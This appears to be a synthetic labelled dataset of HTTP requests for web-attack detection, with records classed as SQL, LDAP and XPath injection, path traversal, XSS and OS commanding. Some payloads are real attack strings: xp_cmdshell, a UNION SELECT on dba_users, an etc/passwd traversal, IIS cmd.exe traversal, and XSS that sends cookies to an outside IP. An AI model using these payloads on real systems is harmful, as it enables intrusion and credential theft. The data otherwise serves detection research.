Pragma: no-cache
Authorization: dpaet1 sie3e=es7o
Range: 92271-,85-
Referer: /msned/imEknn/abea/ntn2.pl
TE: trailers
User-Agent: Mozilla/9.3 (Machintosh; U; Mac OS X 7.5; iu-ly; rv:5.4.8) Gecko/50745770
UA-Disp: 462,901,32
UA-OS: Windows 98
Via: myaor/1.6 204.175.96.66, meEa7/7.4 www.vefetXn.gif:8374
Upgrade: ontd/7.5, eEr1lt/2.5
----: ----------

null

End - Id: 37399
Start - Id: 39124
class: LdapInjection
PUT /bMLzVqFb@Dvak_h9/fqhaSKCaZ.pbQlTfs_/eMkdE@0iHcHM.asmx? HTTP/1.0
Content-Length: 57
Content-Language: reosa,z
Content-Encoding: deflate
Content-Location: /ag1ie/e7ei/ZhYr/MEcoitha.txt
Content-MD5: cWN1c3NscmF1YXJoaFBxYw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 25 Jan 08 03:23:53 GMT
Last-Modified: Tue, 10 May 05 18:25:35 CET
Host: 160.158.239.131
Connection: keep-alive
Accept: audio/x-wav;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: l-NaadlMd;q=0.5
Cookie: nsbTe=7648)(&(objectClass=ann0)(|(sn  =   o8I)(cn=en3    J*));2GCjFFx=supdatenetcatnei fe$<rbwt;te97stgkdtpo=s;aTgSTb=aQa;5kaeeaeken2x=efbeAdftrr;wrrprfJget=m5
Date: Wed, 17 Mar 10 04:59:24 GMT
If-Modified-Since: Wed, 26 Mar 08 13:15:11 GMT
If-Range: Mon, 16 Mar 09 12:24:44 GMT
Max-Forwards: 1716
MIME-Version: 5.3
Pragma: no-cache
Referer: http://hItih.net/frndpoa/sciee/nIedt0r.sh
User-Agent: nenon3ex/3.6
Via: 3.7 www.IhNoti.tiff:86895, rpglei/4.0 www.8qmo.html, 2.6 226.130.168.163
Transfer-Encoding: ss2mLo
Upgrade: rabrt/5.2, bme/8.6, 9s8c/0.0, hcst/1.5

IqoT2T0aP=ohaEecglhanew8lnz&eexmsnasohss2ss=dirtDmiRt9erl

End - Id: 39124
Start - Id: 44882
class: PathTransversal
GET /mEpLewql_x0l@/pnnko0hbtzdctegnnTut/rX/ngfcaismsyd/nYW0O/dnolmir/hyC3.TP.vLb/p2r/drSiidcesaUotnAf.dll?group byPu13KbU=847359440&jetrlci=a4PTkQizx&eurntinrodo=h%24hafe%2Bem+&ktnp=n9openeey%27o&hy1hkilgzd=609465&elsh7u=tnchm&lBP@sMpdbt=.%2F..%2F..%2F..%2F..%2F..%2F&tn32ef=nutK3&sQfromX4update-5ot=dretnetcate%40pH+eologys%3Foue HTTP/1.1
Host: 93.139.223.56
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: y-tnne;q=0.8, emefnaib-nRtkr8t, n-ulN;q=0.4, ar-eaau2kt2;q=0.7
Cache-Control: max-age=10515
Client-ip: 37.4.179.168
Cookie: ni4tair=;r2;ndosoatnrgef=erTmetascript;yiEtdiil=79240;xooh0i=mNohttp
Cookie2: $Version="7"
Date: Fri, 04 May 07 03:45:38 CET
ETag: "Fg6uxv@CUmKOi65"
Expect: 100-continue
From: reecos@eeesftcx.gov
If-Modified-Since: Wed, 14 May 08 11:04:27 GMT
If-Unmodified-Since: Mon, 01 Aug 05 14:41:59 UTC
If-Match: "UR_M8niLWBwxkN1yj"
If-None-Match: *
If-Range: Sat, 02 May 09 01:31:03 CET
Max-Forwards: 4558
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Digest opaque="nwijehr"
Authorization: Basic T3N0bnJVOjFOZ2c=
Range: -41,56231-,-8575
Referer: http://www.aoaHe8.it/ehsn/HeEmcn/etni1cz/itsotk.pl
TE: chunked;q=0.1,chunked;q=0.3
Trailer: TE
User-Agent: htetK1/8.3.3.4
UA-CPU: 68000
UA-Disp: 229,303,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 134x0521
Via: HTTP/6.5 www.nikaStl.htm, 3.9 57.191.67.7:59
Transfer-Encoding: gzip
Upgrade: a04E/0.2, dOen6p/3.6
Warning: 919 218.70.108.162 "ndpaastlweaihe5" "Thu, 07 Apr 05 15:20:50 UTC"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 055847
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44882
Start - Id: 41531
class: SqlInjection
POST /g9/jOjehJK10EMCKljpc/ulr3G4GIU8mePmc/eheepeasua/oF90zhckZsC/F2U-cl3qyZXsig/ytynin/2hloirhnvqep.png? HTTP/1.0
Content-Length: 142
Content-Encoding: compress
Content-Location: http://www.ra7e.de/wp6uv/eo1dn/asjaus.png
Content-MD5: OGhuZzVENE5SYW9ubm9Scg==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Wed, 08 Feb 06 16:13:38 UTC
Host: 171.95.242.195
Connection: nafn4om
Accept-Charset: *
Accept-Encoding: 
Accept-Language: otl05Ke-ffHoe, m-aieE, e5it-e, smoc-a
Cache-Control: es=e6e7
Cookie: s0dit0nTq3aa=rqcr2uoeaknioi;kt=eY3lW;hethlowEY=dlp$%;rzEX7iUDPJps2=zustdebhaa;ibk7a7Nfxcwcyko=Roaa
If-Unmodified-Since: Wed, 11 Feb 04 18:25:15 UTC
Referer: /jsnpr3/e62rTVyn/igeCIe/tinta.zip
TE: trailers,deflate,trailers
User-Agent: Mozilla/1.3 (X11; U; SunOS sun4u 8.3; xf-d9; rv:9.8.5) Gecko/12915127
Via: 5.5 180.254.194.251, 6.1 www.7e8iodhH.js
Transfer-Encoding: compress
Upgrade: ied/4.5, ed6tn/2.3, fotom/3.2, ooni/6.1, hhIt/6.5

0cr=ildIDJzUAKa&RntlIj=534&esoEaNsieb=0835&2QhcSWgD=chairs'     UNION  SELECT     ept    FROM   dba_users    WHERE name     like    '%25

End - Id: 41531
Start - Id: 41010
class: SqlInjection
PUT /e9tonh/u9Fg/lScb7bYsOhhsiserip/emzFdg7GpZYna_wd/g63X1AfPJqBoptCJ/bQU/7xmlNGCOP@JIEmX/miWaiVhnnneLie0etlma/r5s9ztde3c5elgsrew.jpeg? HTTP/1.1
Content-Length: 259
Content-Language: Tarabo0
Content-Encoding: compress
Content-Location: http://ciehAte.st/wsowa/cilm/nhgruun/qt0EE/rehI.cgi
Content-MD5: c2l2aXJwbmRwcmNhaGVuZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 03 Jun 07 06:04:35 UTC
Last-Modified: Thu, 07 May 09 11:08:51 CET
Host: www.7sPDleos.cz
Connection: close
Accept: video/mpeg;q=0.8, application/x-tar, audio/*
Accept-Charset: iso-8859-3, ks_c_5601-1987;q=0.9, iso-8859-4;q=0.7, x-mac-roman, windows-1254
Accept-Encoding: 
Accept-Language: t16oC-6stni, G-tatu
Cache-Control: max-age=40
Client-ip: 103.167.168.13
Cookie: cl74agnripjeav=85759520;rh=44760;dmSoStOw=g
Cookie2: $Version="131"
Date: Mon, 01 Sep 08 09:48:27 GMT
ETag: "J9oOxUDDW36cel@qM"
Expect: v0sro3=eghTm;eprtAa2
From: eal0aMeE@nr960.com
If-Modified-Since: Sun, 12 Dec 04 09:36:24 UTC
If-Unmodified-Since: Wed, 06 Aug 08 14:32:16 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 27 Jul 05 07:48:43 GMT
Max-Forwards: 7
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Digest response="Da7EBFf2e6D8F588b475adAdda612ba3"
Authorization: Basic aWV3anc0bjpuaW5u
Referer: http://www.nCsrahrh.org/eegEh/pnei/symlo5/8meaet.conf
TE: deflate
Trailer: Expect
User-Agent: aqRElofG http://www.ase9ikod.com
UA-Pixels: 892x2342
Via: 9.1 204.101.191.39:95704, FTP/4.1 170.126.25.12
Transfer-Encoding: identity
Upgrade: uw1/6.2, gcsmod/3.8, exeh/4.6
Warning: 164 www.jIwGs.png "tHplR" 
X-Forwarded-For: 134.103.78.204
X-Serial-Number: 0694203566390094
----: --------------------------
~~~~~: ~~~~~~~~~~~~

jc=popt&sottdbhnftiues=4&p8vOp=exec     xp_cmdshell    '"jnlr6m"     >>   script.vbs'&Tr8GconnectU=h7Xk1p8R_K&oox=wecHbH&GIzsperl96vkm=8127&iinetie6dweDDky=9KiNtRQW9s&eotonuc=ritmcofdpt&l86Y4=ejisnE4hoe&tnkeetonoeans=hnsloncln&sgs=bIaoooamupateoen

End - Id: 41010
Start - Id: 36349
class: PathTransversal
GET /A1/tq/vbscript.eCqNK8c1/o-5/Ta.unOjDiRoD/eosinmmneL9dcsesuE.exe?ebs3e1=853&m7=6lda+Aio&mf6iasiol=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&cti7mws=yistheidi&wardnocadlboesh=Adtenbemlml HTTP/1.1
Host: www.Hncoru.uk
Connection: close
Accept: audio/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: Thi-aenoltm, tauu1-tpeyyt43, tfocnowf-ugn;q=0.4
Cache-Control: max-age=78
Client-ip: 238.204.79.45
Cookie: hlOtpsaewh7re57=1299271;gWmhUg=242398838;l8e9tehhiyhie=i~hsopt[a0d|ev;dFEQLlLAMk=ebtSntrq;1Z5Sncx23VeQ@=er+;lhqiGTh1r=r%8)ies
Cookie2: $Version="405"
Date: Mon, 07 Aug 06 23:02:50 CET
ETag: "cfqnbPK5k4tKX2_HzErM"
Expect: yIdnea=sctmien
From: sleras@7i3heoin.uk
If-Modified-Since: Fri, 05 Nov 04 03:38:36 UTC
If-Unmodified-Since: Wed, 16 Jul 08 19:04:03 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 17 Dec 07 02:53:17 GMT
Max-Forwards: 95
MIME-Version: 5.3
Pragma: Eo7rmatt=owzPeti
Proxy-Authorization: Basic YXVJbnM6ZWhpcjFndHU=
Authorization: NTLM YXN0aGM0YTh0aDgzaGlvdG1tNXBwZnJhdG50aDFzc2E=
Range: 75-618834,757-411,77394-267269
Referer: http://nrehein.net/8emnEoao/p7aoq5/8tsCir/Nim6.pl
TE: gzip,deflate,trailers
Trailer: From
User-Agent: eF59kej http://www.elwcsDe.net
UA-CPU: x86
UA-Disp: 7628,9010,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 636x8824
Via: 1.4 57.185.61.236, FTP/6.4 165.207.236.127, FTP/8.7 118.88.194.64
Transfer-Encoding: gzip
Warning: 201 www.dreo.png "soaIbe7zmO" 
X-Forwarded-For: 217.52.49.74
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36349
Start - Id: 49703
class: XPathInjection
GET /hE.jpeg?eo8uEme=lu2sg%27+++or+++6++%3C++count%28path%2Fchild%3A%3A*%29++or++%27rssomec%27++%3D++++%27&0prmbs=eo60y&eTte5slw=tPT-ROkkpgDx&oaeia=1116586&nIO.LUZ.8=4915277&algnHl=benmShr&is=803847679&mY7nctC2s=02 HTTP/1.1
Host: www.sahtee.com:80
Connection: keep-alive
Accept: application/rtf;q=0.6, video/*;q=0.3, image/*;q=0.7
Accept-Charset: x-mac-korean, iso-8859-15;q=0.2, iso-8859-15;q=0.7, cp-950;q=0.8
Accept-Encoding: gzip;q=0.8, compress, compress, identity;q=0.9
Accept-Language: *;q=0.4
Cache-Control: max-age=4
Client-ip: 251.247.9.85
Cookie: Teftgoaelojrax=9tNhutrv;aeTtanieqwrdi=giXCF_tvV8;angse=ly7-Yd-4;ualaqkGn7br24=20264302
Cookie2: $Version="4"
Date: Sun, 10 Oct 04 01:17:19 UTC
ETag: W/"s3klw_r.kke6tQh"
Expect: iaeoct=i0eao6Xh;aoccEe=barnyz
From: tmHtei@9Eaetn4.de
If-Modified-Since: Mon, 04 Jan 10 03:07:35 GMT
If-Unmodified-Since: Tue, 08 Feb 05 21:16:07 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 08 Nov 09 10:52:42 CET
Max-Forwards: 30
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Digest response="3EBCB3A2aaB0a8C77f9b20Ae891C650D"
Authorization: Digest nonce
Range: -394122
Referer: /cutb/mr1aepo/ae1uDq.jsp
TE: trailers
Trailer: Accept-Language
User-Agent: rnhsn/3.9.3.7.0
UA-CPU: StrongARM
UA-Disp: 2722,5111,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 6094x1402
Via: b7oere/7.9 129.234.83.240, HTTP/0.6 www.ozexwa.png:43, 7.9 www.iefih.jpeg
Transfer-Encoding: s9tetd
Upgrade: ierniu/6.4, ytteh/9.3, ahoito/8.8
Warning: 538 76.5.143.201 "toetlotsdoestrvfje" 
X-Forwarded-For: 76.177.20.101
X-Serial-Number: 58499118
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49703
Start - Id: 41891
class: SqlInjection
GET /buletabirtWalagsr1in/nh16/lokybnedRp2g/hNb9ZxOBxoA/sns/rsk_liMDyiSRPzg1qdk/xnsartsonEt/agvEHe8gdV/uQlV5/elgE5esrWUnuauhriiNs.bin?rteewf0xiqeab=046472&deneassat7efart=%27%29+UNION+++ALL++SELECT+++++97%2C20%2C847%2C6%2C6+++++FROM+ia+++++WHERE++++%28++++%27%27++%3D+++%27 HTTP/1.0
Host: www.asdg.net:80
Connection: close
Accept: */*;q=0.6
Accept-Charset: euc-tw;q=0.7, x-mac-arabic;q=0.8, windows-874, iso-8859-6, x-mac-greek;q=0.8
Accept-Encoding: compress;q=0.3, deflate
Accept-Language: *;q=0.7
Cache-Control: max-stale
Client-ip: 143.204.36.23
Cookie: nRtCtnaZtedlen=9ril3ohaving
Cookie2: $Version="81"
Date: Thu, 17 Jul 08 14:39:43 GMT
ETag: W/"a@.Je0Tt.-RJZiQ3wL"
Expect: 100-continue
From: elee@hieitj.de
If-Modified-Since: Thu, 18 Nov 04 14:22:53 UTC
If-Unmodified-Since: Wed, 02 Apr 08 23:01:30 UTC
If-Match: "EUjR03G55pIl1cxiq"
If-None-Match: *
If-Range: Thu, 25 Jan 07 23:32:38 UTC
Max-Forwards: 5
MIME-Version: 7.9
Pragma: rhef1x=be
Proxy-Authorization: itfq bn7bnxr=jeUlmesd
Authorization: 1I2eed gtnFE=ai6QFzl
Range: 3-
Referer: http://aoseleo.org/aruisa/1cnl8tAa/iooA/lusyno/eafa.wmn
TE: chunked,deflate
Trailer: TE
User-Agent: epAKRJ5-Ac http://www.h8aulr.org
UA-CPU: PowerPC
UA-Disp: 421,960,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 044x365
Via: 6.3 185.42.225.104
Transfer-Encoding: nnesi; DotE=wOsnmq
Upgrade: 9sH/0.7, h7C/7.3, a0w3h/0.4
Warning: 209 99.218.44.161 "n5shpLu8ptOeAstrt7u" "Mon, 11 Feb 08 12:06:51 UTC"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 3139045
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41891
Start - Id: 46833
class: XSS
POST /1FPJFyhs4CrPx@/v3M.xallURH/qeb0o/YDhttpsRlEOunioniKzG.png? HTTP/1.0
Content-Length: 379
Content-Language: 5mdfll,Eb,zcr
Content-Encoding: compress
Content-Location: /1Tes/esin/lfancae/nr0lAnsa.pdf
Content-MD5: YXNlaWF1aG5jZU9laGdsYw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 28 Aug 04 23:59:25 GMT
Last-Modified: Mon, 12 Apr 04 10:41:14 GMT
Host: www.o1ire8yuiu.cz:0863
Connection: 2oiGqea
Accept: */*;q=0.2
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 169.136.109.14
Cookie: os6rss1SgG=4847;hoGxegibeE=Ko(%iveig ?fa8wprocessing-instruction;4cFX9k=779
Cookie2: $Version="28"
Date: Mon, 19 Apr 10 13:00:31 CET
ETag: "4y65XizpsvxblzyDhxg"
Expect: 100-continue
From: gUtdmw@nhajiIe.be
If-Modified-Since: Tue, 06 Oct 09 22:37:18 CET
If-Unmodified-Since: Sat, 17 May 08 02:53:56 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3696
MIME-Version: 5.6
Pragma: ci=o7xr
Proxy-Authorization: NTLM Y2xlb0RhYWloY2Vsbm50dG5oZW94ZWV0MHNveWllTW84bm5pajhmcjdyb3Q5
Authorization: Basic ZGdyZ3ZmcTpzZ2x0bQ==
Range: 04-141477,-19
Referer: /otnh/eojte1/ecnAsdo.jpg
TE: deflate;q=0.6
Trailer: If-None-Match
User-Agent: 6qHg7qfvu http://www.qtouvm0a.fr
UA-CPU: Sparc
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 818x5674
Via: 6.4 49.34.252.122
Transfer-Encoding: identity
Upgrade: ccSen/7.1
Warning: 250 www.tehienag.htm:29 "ch4lludtirn1fS" 
X-Forwarded-For: 92.3.241.226
X-Serial-Number: 072274181665
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

4S3renabsha=kNZanf7mh&5@f0-s6z=qmthwp-&btaeifuaier=2785304482&ebhtgaw2vpmi=hn&ooMOise=EIpaitldaieR&M6wC5a=xrCGMZwmcgBS&hptassraalort=sUu&iDihLfruBsaou=rtZtftpheo pautoexecdie&one=98166&EA3eedihen=cvc7B3fTRc&nt5qchfm=2?&toaa=<img  src=&{[window.open('http://65.138.216.145/nt.cgi'+document.cookie);]};  >&viVheB=e3.1ljm.EW&Vy0Tevv2P=2797788

End - Id: 46833
Start - Id: 43867
class: OsCommanding
GET /scripts/..%5c%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.Dhdy.be
Connection: sreero
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 132.134.82.134
Cookie: aooDNe8aehuod=deo;dOFB.bfyamail=3811990;enoLr1hte=e07a6j;Tsht=yhelf5hqdAe4etJhm;Nn=ee\stwqitmginhn
Cookie2: $Version="109"
Date: Sun, 22 Feb 04 09:59:22 UTC
ETag: "dGEC@BIj22_xTSaE@"
Expect: 100-continue
From: nxa0tn0@Cododus.net
If-Modified-Since: Mon, 22 May 06 14:23:51 GMT
If-Unmodified-Since: Tue, 06 May 08 05:15:25 UTC
If-Match: "V_CJiOGq0qH4Xo7"
If-None-Match: *
If-Range: *
Max-Forwards: 98
MIME-Version: 1.9
Pragma: fAttmFml='s4a'
Proxy-Authorization: Digest cnonce="tRstaerb"
Authorization: NTLM aGdkYTdjZWRucWhVZVdUdWVFZWNwbnNleXRvNXR0bWlhc21yZGZkNnJjYWNFcjU3
Range: 91796-,027282-114595
Referer: http://tsjt.st/eljae/fitaSq.aspx
TE: trailers
Trailer: User-Agent
User-Agent: wsdoia7ih9hlgEt8sew
UA-CPU: Sparc
UA-Disp: 191,2261,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 629x1097
Via: FTP/7.1 www.dsOpFhe.jpg:988, FTP/1.3 www.fndeeYt.html, HTTP/6.4 222.118.147.81:4
Transfer-Encoding: 1qsm; vrjcoda9=adoeErc7
Upgrade: 0a7on5/8.8, emazee/1.9, 1hodgr/0.0, auiinp/3.7
Warning: 271 62.138.196.100 "8z8l8ou" "Tue, 21 Feb 06 05:57:12 CET"
X-Forwarded-For: 160.49.9.9
X-Serial-Number: 77798884304573720348
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 43867
Start - Id: 45242
class: PathTransversal
GET ////? HTTP/1.1
Host: 45.52.206.55
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: dnqr8te-Tf;q=0.0
Cache-Control: only-if-cached
Client-ip: 172.49.251.232
Cookie: Bv7system-Qconnectq=n>h;bgsoundBhttpnRs0sQ=tflo;tebvet=|actnibM> like
Cookie2: $Version="453"
Date: Sun, 29 Apr 07 21:15:38 GMT
ETag: W/"1zCMerrDLd5uVQVT"
Expect: 100-continue
From: nr1cs36r@ar1hsxlt.org
If-Modified-Since: Mon, 26 Apr 10 02:37:03 UTC
If-Unmodified-Since: Sun, 29 Apr 07 07:15:34 GMT
If-Match: *
If-None-Match: "ZeUMHVkrw.uVUbox3"
If-Range: Thu, 26 Feb 09 18:52:01 CET
Max-Forwards: 8800
MIME-Version: 1.7
Pragma: 6o2iTn='e7h'
Proxy-Authorization: Digest qop=evai40
Authorization: sp25il SUuE=4iuouhb
Range: 220-5761,42620-
Referer: http://slliee.it/lriyt/oistEiti.cgi
TE: chunked;q=0.3,trailers
Trailer: Expect
User-Agent: ppiiases
UA-CPU: x86
UA-Disp: 568,3282,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 2272x045
Via: nneodo/9.9 www.8ar3eob.jpg:0444, wreTl/9.0 111.212.219.44:0, 7.6 212.203.15.0
Transfer-Encoding: compress
Upgrade: ttt5/9.0, laolhr/8.9, geei2/4.3
Warning: 831 www.rueghla.htm "ecA7eejeodtti" 
X-Forwarded-For: 42.110.150.96
X-Serial-Number: 67855229
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45242
Start - Id: 38902
class: LdapInjection
GET /aMRkK/V8M-C52ll9M6_/beobt0ttahenEng3e/htUsui2tlt/aeaige/iTgrwirhloatrta9pwan/Ggolgedinsuhc/i0ng@4J/engqr540.php3?uVQ725qOhtaccesinsertM=lIrhn&ol=dr%5D&totivNsxmtis=%40moeohe6&tnrcctroee=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&eaeWryeIbnj=rOe&aaa4=lX2mjRXSj&toethfh=xp_xmlt0uitnre%7C&iuduttu2sdrsti=109&nrrte=on HTTP/1.1
Host: www.ln5OoZyfi.be:80
Connection: keep-alive
Accept: audio/*, image/gif, video/quicktime
Accept-Charset: iso-8859-3;q=0.4, koi8-r, cp-936, cp-950, koi8
Accept-Encoding: identity;q=0.7, deflate;q=0.1
Accept-Language: *;q=0.4
Cache-Control: max-stale
Cookie: eyIard=relmsneg0lteoatbi;udhucngsm8n=7hjbvNSuqX;iafsumrek=ncu/  hOlocationtiuntgroup byit ;.dRVZYA=lt-;a7npdaAvteyiuN=iirn
Date: Wed, 12 Apr 06 07:58:24 CET
ETag: W/"2GEamMx-ggUI9_T@t"
Expect: 100-continue
If-Modified-Since: Mon, 27 Feb 06 11:19:12 CET
If-Unmodified-Since: Wed, 03 Mar 04 18:11:01 GMT
If-Match: "aAl5EME3QyB0rxU@Vku6"
If-None-Match: *
If-Range: Fri, 17 Nov 06 15:17:21 UTC
Max-Forwards: 9407
Pragma: no-cache
Authorization: 77rz aCeoso2=eaoz
Range: 82450-0782,-876
Referer: http://www.S2iwdm5t.org/mwbh.js
TE: trailers,gzip;q=0.2,trailers
Trailer: Transfer-Encoding
User-Agent: mrhnp (sYcOIDr)
UA-OS: Win95
Via: 4.6 www.0ddt.htm
Transfer-Encoding: gzip
X-Serial-Number: 99898684535119255
----: -------------------

null

End - Id: 38902
Start - Id: 44875
class: PathTransversal
GET /Eeesshrts/ta9Ngtoo/mNe5p/oHs7r_.sRy7tNJM_-AAv/dwmKp/s3sLtiiqNOl1oo/d-xbqkJ/5ootaotgeogt/aVPzv/oavfBXRcPH.0k/Luos3lehaeesNsnhfuOa.png?IK5mP=..%2F..%2F..%2Fusr%2Fdsqqdsqsd.xml&tNfoV=rtsw2ta&Wn5b=Agts5ch&umO78Nv=66 HTTP/1.1
Host: www.ulast8e.com
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.4, compress;q=0.0, identity, deflate;q=0.8
Accept-Language: re-ea;q=0.1, d5tiE0i-kx;q=0.7
Cache-Control: no-store
Client-ip: 32.25.74.7
Cookie: 55ctskeyg=djgn
Cookie2: $Version="6"
Date: Thu, 16 Sep 04 16:47:30 GMT
ETag: "udDi1mJbf1wg0EaH"
Expect: ritRee
From: crrs@n6en.net
If-Modified-Since: Fri, 15 Jan 10 15:58:51 GMT
If-Unmodified-Since: Mon, 10 Sep 07 07:07:19 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: E6i4en cnemics=iaikur
Authorization: NTLM eW9lYXR0VjRpbTNpazJ1MHN0d2VpaHV5NXR3dWVkYmFjdXB0Z3NiZGdIZ20=
Range: -41,56231-,-8575
Referer: http://www.eshlvht.org/zbjseoe/ieai/dfyr/e7cadh/pSpggeHb.mpg
TE: gzip,trailers,trailers
Trailer: If-None-Match
User-Agent: eerjemaaet (kCeo3pRyP; eY4vLJ29MN; wlgCHPDtW.; e0RxEo.l-N)
UA-CPU: 68000
UA-Disp: 229,303,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 134x0521
Via: 5.8 www.raoYe.jpeg, HTTP/5.7 74.144.123.44, 3.0 www.dItnuqws.png
Transfer-Encoding: mhSsr1
Upgrade: taswen/8.6, 6o7td/4.7, soc/6.3
Warning: 919 218.70.108.162 "ndpaastlweaihe5" "Thu, 07 Apr 05 15:20:50 UTC"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 279429
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44875
Start - Id: 36613
class: OsCommanding
GET /scripts/..%5c%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 148.90.183.7
Connection: bigcn3dn
Accept: */*
Accept-Charset: x-mac-chinesetrad;q=0.5, cp-936;q=0.8, ks_c_5601-1987;q=0.8, iso-8859-9, x-mac-chinesetrad
Accept-Encoding: gzip;q=0.0, identity
Accept-Language: hym97-hs0;q=0.9, Nuhhuey-L3tbeAlp;q=0.7, b0qd5um-ssrnitiu;q=0.9
Cache-Control: no-cache
Client-ip: 34.3.142.249
Cookie: hssccsHahhsm=Eaae/ot'iE ;eoe=509;zr=@E;75k6CunionGiiKV1=53
Cookie2: $Version="9"
Date: Sun, 20 Jan 08 05:47:02 CET
ETag: "3FW1P6WeZ_tcD9N"
Expect: eeKDayi
From: femsa@iitoSokm9u.de
If-Modified-Since: Thu, 09 Jun 05 17:45:17 UTC
If-Unmodified-Since: Tue, 27 May 08 07:03:18 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 21 Jul 07 02:16:37 CET
Max-Forwards: 5134
MIME-Version: 1.9
Pragma: dpags=th2dia
Proxy-Authorization: Basic RWViaWU6ZWh6c3JkYw==
Authorization: Basic TmMzYTplZGlpQ3RocQ==
Range: 8050-
Referer: http://amerhe3S.biz/aNsJeas.mpeg
TE: trailers
Trailer: If-Match
User-Agent: eowiac8UAtne
UA-CPU: MIPS
UA-Disp: 5747,1006,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 477x077
Via: lxati/9.6 188.150.241.28, 4.2 254.241.168.88:7635
Transfer-Encoding: deflate
Upgrade: hr8so/4.0, h23/1.4, yud3rE/6.4, xdnou/0.4, bIe4Er/8.9
Warning: 933 www.oecji.html "M3c95ra8" "Thu, 10 Dec 09 13:28:45 UTC"
X-Forwarded-For: 68.142.150.165
X-Serial-Number: 24160337067765
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36613
Start - Id: 43754
class: OsCommanding
GET ..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 195.161.28.117:80
Connection: oTflttzn
Accept: image/*;q=0.4
Accept-Charset: koi8;q=0.2, cp-936;q=0.0, windows-1250, iso-2022-kr;q=0.9
Accept-Encoding: *;q=0.2
Accept-Language: rAe-tettn2T, bt-of
Cache-Control: max-stale=5
Client-ip: 251.209.185.79
Cookie: 177system4YAi5=514;u2n9blpeD5=2295257394;ocoH=0776;hdzgiodpwAfew=mB dtesnph-systemaa~ y
Cookie2: $Version="1"
Date: Tue, 29 Mar 05 24:34:18 GMT
ETag: W/"eswt@0WOjNcHm0ay1zzd"
Expect: fe8gaSr=na4I2h
From: Reoco@amlrswscus.de
If-Modified-Since: Sun, 10 Oct 04 02:21:56 CET
If-Unmodified-Since: Sat, 14 Mar 09 15:03:08 GMT
If-Match: "1GH--iKf_fhk5Nb1."
If-None-Match: *
If-Range: Tue, 19 Oct 04 05:08:13 GMT
Max-Forwards: 7
MIME-Version: 7.8
Pragma: eeehof=da
Proxy-Authorization: Digest cnonce="rPoaihzn"
Authorization: e06y dDsTer88=iuemad
Range: 210020-381691,-20380,4976-
Referer: http://2rTael.fr/9xr3et.shtml
TE: deflate;q=0.0,trailers,deflate;q=0.6
Trailer: If-Unmodified-Since
User-Agent: Mozilla/0.9 (Windows; U; Windows NT 2.9; ug-0r; rv:0.6.1) Gecko/27923778
UA-CPU: Sparc
UA-Disp: 624,195,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 7271x959
Via: 7.6 www.jm2hErsu.jpg, HTTP/4.2 www.aged.png, 9.9 www.saos.css
Transfer-Encoding: compress
Upgrade: 2Ytn/5.0, a8qtt/0.1
Warning: 960 13.127.188.120 "eVdond" 
X-Forwarded-For: 247.183.255.17
X-Serial-Number: 442223002
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43754
Start - Id: 43657
class: OsCommanding
PUT /4pQ6cIBw2/canij/oulox/cd/viyzciS/ieOryhtidhts/lSa0a5MoS/sswthsor/wNAhttps0bin.IWJcat.G/aTbuYLIwrvrIOlI1/ht84.png? HTTP/1.1
Content-Length: 55
